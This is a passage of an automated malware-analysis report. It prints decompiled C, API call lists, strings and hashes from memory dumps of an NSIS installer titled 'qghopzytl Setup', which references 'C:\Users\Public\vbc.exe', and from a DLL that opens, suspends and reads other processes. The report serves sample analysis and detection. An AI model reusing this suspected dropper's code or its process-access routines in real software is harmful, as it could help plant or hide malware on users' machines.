              						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
              					}
              					CloseHandle( *(_t58 + 8));
              				}
              				_t53 = 0xfffffff3;
              				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
              					_t53 = 0xffffffef;
              					DeleteFileA( *(_t58 - 0x38));
              					 *((intOrPtr*)(_t58 - 4)) = 1;
              				}
              				_push(_t53);
              				E00401423();
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
              				return 0;
              			}












              APIs
              • GlobalAlloc.KERNEL32(00000040,00008800,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
              • GlobalFree.KERNEL32(?), ref: 00402758
              • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
              • GlobalFree.KERNEL32(00000000), ref: 00402771
              • CloseHandle.KERNEL32(?), ref: 00402789
              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
              • String ID:
              • API String ID: 3294113728-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00404EB3(CHAR* _a4, CHAR* _a8) {
              				struct HWND__* _v8;
              				signed int _v12;
              				CHAR* _v32;
              				long _v44;
              				int _v48;
              				void* _v52;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				CHAR* _t26;
              				signed int _t27;
              				CHAR* _t28;
              				long _t29;
              				signed int _t39;
              
              				_t26 =  *0x42e404; // 0x0
              				_v8 = _t26;
              				if(_t26 != 0) {
              					_t27 =  *0x42ecd4; // 0x0
              					_v12 = _t27;
              					_t39 = _t27 & 0x00000001;
              					if(_t39 == 0) {
              						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
              					}
              					_t26 = lstrlenA(0x429878);
              					_a4 = _t26;
              					if(_a8 == 0) {
              						L6:
              						if((_v12 & 0x00000004) == 0) {
              							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
              						}
              						if((_v12 & 0x00000002) == 0) {
              							_v32 = 0x429878;
              							_v52 = 1;
              							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
              							_v44 = 0;
              							_v48 = _t29 - _t39;
              							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
              							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
              						}
              						if(_t39 != 0) {
              							_t28 = _a4;
              							 *((char*)(_t28 + 0x429878)) = 0;
              							return _t28;
              						}
              					} else {
              						_t26 =  &(_a4[lstrlenA(_a8)]);
              						if(_t26 < 0x800) {
              							_t26 = lstrcatA(0x429878, _a8);
              							goto L6;
              						}
              					}
              				}
              				return _t26;
              			}


















              APIs
              • lstrlenA.KERNEL32(00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
              • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
              • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041A276,74EC110C), ref: 00404F0F
              • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
              • SendMessageA.USER32 ref: 00404F47
              • SendMessageA.USER32 ref: 00404F61
              • SendMessageA.USER32 ref: 00404F6F
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: MessageSend$lstrlen$TextWindowlstrcat
              • String ID:
              • API String ID: 2531174081-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00404782(struct HWND__* _a4, intOrPtr _a8) {
              				long _v8;
              				signed char _v12;
              				unsigned int _v16;
              				void* _v20;
              				intOrPtr _v24;
              				long _v56;
              				void* _v60;
              				long _t15;
              				unsigned int _t19;
              				signed int _t25;
              				struct HWND__* _t28;
              
              				_t28 = _a4;
              				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
              				if(_a8 == 0) {
              					L4:
              					_v56 = _t15;
              					_v60 = 4;
              					SendMessageA(_t28, 0x110c, 0,  &_v60);
              					return _v24;
              				}
              				_t19 = GetMessagePos();
              				_v16 = _t19 >> 0x10;
              				_v20 = _t19;
              				ScreenToClient(_t28,  &_v20);
              				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
              				if((_v12 & 0x00000066) != 0) {
              					_t15 = _v8;
              					goto L4;
              				}
              				return _t25 | 0xffffffff;
              			}















              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
              				char _v68;
              				int _t11;
              				int _t20;
              
              				if(_a8 == 0x110) {
              					SetTimer(_a4, 1, 0xfa, 0);
              					_a8 = 0x113;
              				}
              				if(_a8 == 0x113) {
              					_t20 =  *0x414c40; // 0x8800
              					_t11 =  *0x428c50;
              					if(_t20 >= _t11) {
              						_t20 = _t11;
              					}
              					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
              					SetWindowTextA(_a4,  &_v68);
              					SetDlgItemTextA(_a4, 0x406,  &_v68);
              				}
              				return 0;
              			}







              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
              • MulDiv.KERNEL32 ref: 00402BB4
              • wsprintfA.USER32 ref: 00402BC4
              • SetWindowTextA.USER32(?,?), ref: 00402BD4
              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
              Strings
              • verifying installer: %d%%, xrefs: 00402BBE
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: verifying installer: %d%%
              • API String ID: 1451636040-82062127
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 35%
              			E730641A0(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, int _a24, int _a28, int _a32) {
              				int _v8;
              				int _v12;
              				void* _v16;
              				intOrPtr _v20;
              				int _v24;
              				int _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				intOrPtr _v40;
              				int _v44;
              				void* _v48;
              				int _t67;
              				intOrPtr _t68;
              				intOrPtr _t70;
              				int _t71;
              				int _t73;
              				int _t77;
              				int _t80;
              				int _t89;
              				void* _t117;
              				void* _t122;
              				void* _t123;
              				void* _t124;
              
              				_v40 = E73061490(_a4);
              				_v36 = 0x80004005;
              				_t67 = _a24;
              				0x73060000(_a20, _t67, _a28, _a32);
              				_t68 = _a12;
              				0x73060000(_t68, _a16, _t67);
              				0x73060000("%p, %u, %s, %s, %p, %u, %p.\n", _a4, _a8, _t68);
              				_push(_v40);
              				_t70 = E73061120(_v40);
              				_t122 = _t117 + 0x34;
              				_v20 = _t70;
              				if(_v20 == 0) {
              					return 0x8000ffff;
              				}
              				__eflags = _a8 - 0xffffffff;
              				if(__eflags != 0) {
              					_t71 = E730613B0(__eflags, _v20, _a8);
              					_t123 = _t122 + 8;
              					_v12 = _t71;
              				} else {
              					_t89 = E730613F0(__eflags, _v20, _a12, _a16);
              					_t123 = _t122 + 0xc;
              					_v12 = _t89;
              				}
              				__eflags = _v12;
              				if(_v12 != 0) {
              					_t73 = GetFileVersionInfoSizeA(_v12 + 0x40,  &_v44);
              					_v8 = _t73;
              					__eflags = _v8;
              					if(_v8 != 0) {
              						0x73060000(_v8);
              						_t124 = _t123 + 4;
              						_v16 = _t73;
              						__eflags = _v16;
              						if(_v16 != 0) {
              							_t77 = GetFileVersionInfoA(_v12 + 0x40, _v44, _v8, _v16);
              							__eflags = _t77;
              							if(_t77 == 0) {
              								L27:
              								0x73060000(_v16);
              								return _v36;
              							}
              							_t80 = VerQueryValueA(_v16, _a20,  &_v48,  &_v8);
              							__eflags = _t80;
              							if(_t80 == 0) {
              								goto L27;
              							}
              							__eflags = _a32;
              							if(_a32 != 0) {
              								 *_a32 = _v8;
              							}
              							__eflags = _a24;
              							if(_a24 != 0) {
              								__eflags = _a28;
              								if(_a28 != 0) {
              									__eflags = _v8 - _a28;
              									if(_v8 >= _a28) {
              										_v24 = _a28;
              									} else {
              										_v24 = _v8;
              									}
              									_v28 = _v24;
              									__eflags = _v28;
              									if(_v28 != 0) {
              										0x73060000(_a24, _v48, _v28);
              										_t124 = _t124 + 0xc;
              									}
              								}
              							}
              							__eflags = _a24;
              							if(_a24 == 0) {
              								L25:
              								_v32 = 0;
              								L26:
              								_v36 = _v32;
              								goto L27;
              							}
              							__eflags = _a28 - _v8;
              							if(_a28 >= _v8) {
              								goto L25;
              							}
              							_v32 = 1;
              							goto L26;
              						}
              						return 0x8007000e;
              					}
              					return 0x80004005;
              				} else {
              					0x73060000("Was unable to locate module.\n");
              					return 0x80070057;
              				}
              			}

              Strings
              • %p, %u, %s, %s, %p, %u, %p., xrefs: 730641EE
              • Was unable to locate module., xrefs: 73064252
              Memory Dump Source
              • Source File: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID: %p, %u, %s, %s, %p, %u, %p.$Was unable to locate module.
              • API String ID: 0-1385147342
              • Opcode ID: cb62e0e27fee877367d851148de180fb0bc8cb8ceadee9c8109839dbd3e48b2d
              • Instruction ID: 30779d81947da2f4556108a79856dc41912f47f7df398561d9c9cc8583ea3245
              • Opcode Fuzzy Hash: cb62e0e27fee877367d851148de180fb0bc8cb8ceadee9c8109839dbd3e48b2d
              • Instruction Fuzzy Hash: 4A513CB5D04219EFDB04CF94D880BDEB3F9BF88B04F548618E916A7248D734EA54CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 17%
              			E73066A70(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
              				long* _v8;
              				signed int _v12;
              				int _v16;
              				int _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				long* _t49;
              
              				_v28 = E730614A0(_a4);
              				0x73060000("%p, %#x, %u.\n", _a4, _a8, _a12);
              				_push(_v28);
              				_v8 = E73061120(_a4);
              				if(_v8 != 0) {
              					if((_v8[1] & 0x00000001) == 0) {
              						0x73060000("Unsupported attach flags %#x.\n", _v8[1]);
              						return 0x80004001;
              					}
              					if((_v8[1] & 0x00000004) != 0) {
              						_v16 = 0;
              					} else {
              						_v16 = 1;
              					}
              					_v20 = _v16;
              					_v12 = 0x1030;
              					if(_v20 != 0) {
              						_v12 = _v12 | 0x00000800;
              					}
              					_v8[2] = OpenProcess(_v12, 0,  *_v8);
              					if(_v8[2] != 0) {
              						if(_v20 != 0) {
              							_t49 = _v8;
              							0x73060000( *((intOrPtr*)(_t49 + 8)));
              							_v24 = _t49;
              							if(_v24 != 0) {
              								0x73060000("Failed to suspend a process, status %#x.\n", _v24);
              							}
              						}
              						return 0;
              					} else {
              						0x73060000("Failed to get process handle for pid %#x.\n",  *_v8);
              						return 0x8000ffff;
              					}
              				}
              				return 0x8000ffff;
              			}

              APIs
              • OpenProcess.KERNEL32(00001030,00000000,00000000), ref: 73066B12
              Strings
              • %p, %#x, %u., xrefs: 73066A91
              • Unsupported attach flags %#x., xrefs: 73066B7D
              • Failed to get process handle for pid %#x., xrefs: 73066B2D
              • Failed to suspend a process, status %#x., xrefs: 73066B63
              Memory Dump Source
              • Source File: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID: OpenProcess
              • String ID: %p, %#x, %u.$Failed to get process handle for pid %#x.$Failed to suspend a process, status %#x.$Unsupported attach flags %#x.
              • API String ID: 3743895883-1030270061
              • Opcode ID: 0e850805c8de28bc22dcca42a48bdf92b7944996cef7409904091f84819d0352
              • Instruction ID: 9817c839756a1264bd0468bb6cd7cb1c5e987fce4ab7a8b0ce9da08d82278e6a
              • Opcode Fuzzy Hash: 0e850805c8de28bc22dcca42a48bdf92b7944996cef7409904091f84819d0352
              • Instruction Fuzzy Hash: 74314DB9E00109EFEB00DF94C951BAEB7F5BB84704F14815CE806AB389D735AE90CB91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E00402336(void* __eax) {
              				void* _t15;
              				char* _t18;
              				int _t19;
              				char _t24;
              				int _t27;
              				signed int _t30;
              				intOrPtr _t35;
              				void* _t37;
              
              				_t15 = E00402B1E(__eax);
              				_t35 =  *((intOrPtr*)(_t37 - 0x18));
              				 *(_t37 - 0x34) =  *(_t37 - 0x14);
              				 *(_t37 - 0x38) = E00402A29(2);
              				_t18 = E00402A29(0x11);
              				_t30 =  *0x42ecd0; // 0x0
              				 *(_t37 - 4) = 1;
              				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
              				if(_t19 == 0) {
              					if(_t35 == 1) {
              						E00402A29(0x23);
              						_t19 = lstrlenA(0x40a440) + 1;
              					}
              					if(_t35 == 4) {
              						_t24 = E00402A0C(3);
              						 *0x40a440 = _t24;
              						_t19 = _t35;
              					}
              					if(_t35 == 3) {
              						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
              					}
              					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
              						 *(_t37 - 4) = _t27;
              					}
              					_push( *(_t37 + 8));
              					RegCloseKey();
              				}
              				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
              				return 0;
              			}

              APIs
              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402374
              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd99E0.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
              • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd99E0.tmp,00000000), ref: 004023CD
              • RegCloseKey.ADVAPI32(?), ref: 004024B0
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CloseCreateValuelstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp
              • API String ID: 1356686001-852824691
              • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
              • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
              • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
              • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004038E3(void* __ecx, void* __eflags) {
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed short _t6;
              				intOrPtr _t11;
              				signed int _t13;
              				intOrPtr _t15;
              				signed int _t16;
              				signed short* _t18;
              				signed int _t20;
              				signed short* _t23;
              				intOrPtr _t25;
              				signed int _t26;
              				intOrPtr* _t27;
              
              				_t24 = "1033";
              				_t13 = 0xffff;
              				_t6 = E00405B3E(__ecx, "1033");
              				while(1) {
              					_t26 =  *0x42ec64; // 0x1
              					if(_t26 == 0) {
              						goto L7;
              					}
              					_t15 =  *0x42ec30; // 0x504d60
              					_t16 =  *(_t15 + 0x64);
              					_t20 =  ~_t16;
              					_t18 = _t16 * _t26 +  *0x42ec60;
              					while(1) {
              						_t18 = _t18 + _t20;
              						_t26 = _t26 - 1;
              						if((( *_t18 ^ _t6) & _t13) == 0) {
              							break;
              						}
              						if(_t26 != 0) {
              							continue;
              						}
              						goto L7;
              					}
              					 *0x42e400 = _t18[1];
              					 *0x42ecc8 = _t18[3];
              					_t23 =  &(_t18[5]);
              					if(_t23 != 0) {
              						 *0x42e3fc = _t23;
              						E00405B25(_t24,  *_t18 & 0x0000ffff);
              						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "qghopzytl Setup", 0xfffffffe));
              						_t11 =  *0x42ec4c; // 0x3
              						_t27 =  *0x42ec48; // 0x504f0c
              						if(_t11 == 0) {
              							L15:
              							return _t11;
              						}
              						_t25 = _t11;
              						do {
              							_t11 =  *_t27;
              							if(_t11 != 0) {
              								_t5 = _t27 + 0x18; // 0x504f24
              								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
              							}
              							_t27 = _t27 + 0x418;
              							_t25 = _t25 - 1;
              						} while (_t25 != 0);
              						goto L15;
              					}
              					L7:
              					if(_t13 != 0xffff) {
              						_t13 = 0;
              					} else {
              						_t13 = 0x3ff;
              					}
              				}
              			}

              APIs
              • SetWindowTextA.USER32(00000000,qghopzytl Setup), ref: 0040397B
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: TextWindow
              • String ID: "C:\Users\Public\vbc.exe" $1033$`MP$qghopzytl Setup
              • API String ID: 530164218-3795686686
              • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
              • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
              • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
              • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 45%
              			E73062D80(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, long _a20, intOrPtr* _a24) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				long _v16;
              				void* _t24;
              				intOrPtr _t28;
              
              				_v12 = E73061480(_a4);
              				_v8 = 0;
              				_t24 = _a16;
              				0x73060000(_a8, _a12, _t24, _a20, _a24);
              				0x73060000("%p, %s, %p, %u, %p.\n", _a4, _t24);
              				_push(_v12);
              				 *0x73068000 = E73061120(_a4);
              				if( *0x73068000 != 0) {
              					_t28 =  *0x73068000;
              					_t39 =  *(_t28 + 8);
              					if(ReadProcessMemory( *(_t28 + 8), _a8, _a16, _a20,  &_v16) == 0) {
              						_v8 = E73067790(_t39, GetLastError());
              						0x73060000("Failed to read process memory %#x.\n", _v8);
              					} else {
              						if(_a24 != 0) {
              							 *_a24 = _v16;
              						}
              					}
              					return _v8;
              				}
              				return 0x8000ffff;
              			}

              APIs
              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 73062E04
              Strings
              • Failed to read process memory %#x., xrefs: 73062E34
              • %p, %s, %p, %u, %p., xrefs: 73062DBD
              Memory Dump Source
              • Source File: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID: MemoryProcessRead
              • String ID: %p, %s, %p, %u, %p.$Failed to read process memory %#x.
              • API String ID: 1726664587-1385917401
              • Opcode ID: b3fe2ef1b2da276f82c13a1ae0fa7211d110e300abde72dcaa09949419306a85
              • Instruction ID: 2f83858864f7670308eb6f72c1b29c73eabea7d20ab84b155ae9b0a85a5452d5
              • Opcode Fuzzy Hash: b3fe2ef1b2da276f82c13a1ae0fa7211d110e300abde72dcaa09949419306a85
              • Instruction Fuzzy Hash: 082148F6904609EFDB04DFA4D844F9E77B9AB4C604F108568F909DB249D730DA14CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 84%
              			E00402A69(void* _a4, char* _a8, long _a12) {
              				void* _v8;
              				char _v272;
              				signed char _t16;
              				long _t18;
              				long _t25;
              				intOrPtr* _t27;
              				long _t28;
              
              				_t16 =  *0x42ecd0; // 0x0
              				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
              				if(_t18 == 0) {
              					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
              						__eflags = _a12;
              						if(_a12 != 0) {
              							RegCloseKey(_v8);
              							L8:
              							__eflags = 1;
              							return 1;
              						}
              						_t25 = E00402A69(_v8,  &_v272, 0);
              						__eflags = _t25;
              						if(_t25 != 0) {
              							break;
              						}
              					}
              					RegCloseKey(_v8);
              					_t27 = E00405F57(4);
              					if(_t27 == 0) {
              						__eflags =  *0x42ecd0; // 0x0
              						if(__eflags != 0) {
              							goto L8;
              						}
              						_t28 = RegDeleteKeyA(_a4, _a8);
              						__eflags = _t28;
              						if(_t28 != 0) {
              							goto L8;
              						}
              						return _t28;
              					}
              					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
              				}
              				return _t18;
              			}

              APIs
              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
              • RegCloseKey.ADVAPI32(?), ref: 00402ACF
              • RegCloseKey.ADVAPI32(?), ref: 00402AF4
              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Close$DeleteEnumOpen
              • String ID:
              • API String ID: 1912718029-0
              • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
              • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
              • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
              • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00401CDE(int __edx) {
              				void* _t17;
              				struct HINSTANCE__* _t21;
              				struct HWND__* _t25;
              				void* _t27;
              
              				_t25 = GetDlgItem( *(_t27 - 8), __edx);
              				GetClientRect(_t25, _t27 - 0x50);
              				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
              				if(_t17 != _t21) {
              					DeleteObject(_t17);
              				}
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
              				return 0;
              			}

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
              				char _v36;
              				char _v68;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t21;
              				signed int _t22;
              				void* _t29;
              				void* _t31;
              				void* _t32;
              				void* _t41;
              				signed int _t43;
              				signed int _t47;
              				signed int _t50;
              				signed int _t51;
              				signed int _t53;
              
              				_t21 = _a16;
              				_t51 = _a12;
              				_t41 = 0xffffffdc;
              				if(_t21 == 0) {
              					_push(0x14);
              					_pop(0);
              					_t22 = _t51;
              					if(_t51 < 0x100000) {
              						_push(0xa);
              						_pop(0);
              						_t41 = 0xffffffdd;
              					}
              					if(_t51 < 0x400) {
              						_t41 = 0xffffffde;
              					}
              					if(_t51 < 0xffff3333) {
              						_t50 = 0x14;
              						asm("cdq");
              						_t22 = 1 / _t50 + _t51;
              					}
              					_t23 = _t22 & 0x00ffffff;
              					_t53 = _t22 >> 0;
              					_t43 = 0xa;
              					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
              				} else {
              					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
              					_t47 = 0;
              				}
              				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
              				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
              				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
              				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
              				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
              			}




















              APIs
              • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
              • wsprintfA.USER32 ref: 0040471E
              • SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s
              • API String ID: 3540041739-3551169577
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 51%
              			E00401BCA() {
              				signed int _t28;
              				CHAR* _t31;
              				long _t32;
              				int _t37;
              				signed int _t38;
              				int _t42;
              				int _t48;
              				struct HWND__* _t52;
              				void* _t55;
              
              				 *(_t55 - 8) = E00402A0C(3);
              				 *(_t55 + 8) = E00402A0C(4);
              				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
              					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
              				}
              				__eflags =  *(_t55 - 0x14) & 0x00000002;
              				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
              					 *(_t55 + 8) = E00402A29(0x44);
              				}
              				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
              				_push(1);
